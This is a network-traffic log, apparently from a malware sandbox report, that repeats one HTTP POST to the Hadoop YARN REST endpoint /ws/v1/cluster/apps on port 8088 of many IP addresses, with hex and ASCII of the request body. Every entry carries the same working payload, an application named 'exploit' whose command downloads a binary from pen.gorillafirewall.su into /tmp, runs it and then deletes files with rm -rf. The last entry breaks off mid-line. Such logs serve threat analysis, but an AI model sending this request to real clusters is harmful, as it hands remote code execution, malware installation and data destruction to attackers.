                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 78.220.79.118:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 78.220.79.118:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 78.220.79.118:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 52.160.110.126:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 138.85.232.54:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 78.220.79.118:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 82.207.23.152:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 100.179.115.147:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 103.108.227.184:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 244.58.211.204:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 244.58.211.204:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 99.17.152.234:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 199.119.126.228:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 123.191.93.71:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 254.41.12.18:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 213.49.53.56:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 91.185.226.47:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 187.125.238.133:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 33.247.222.246:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 182.203.244.103:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 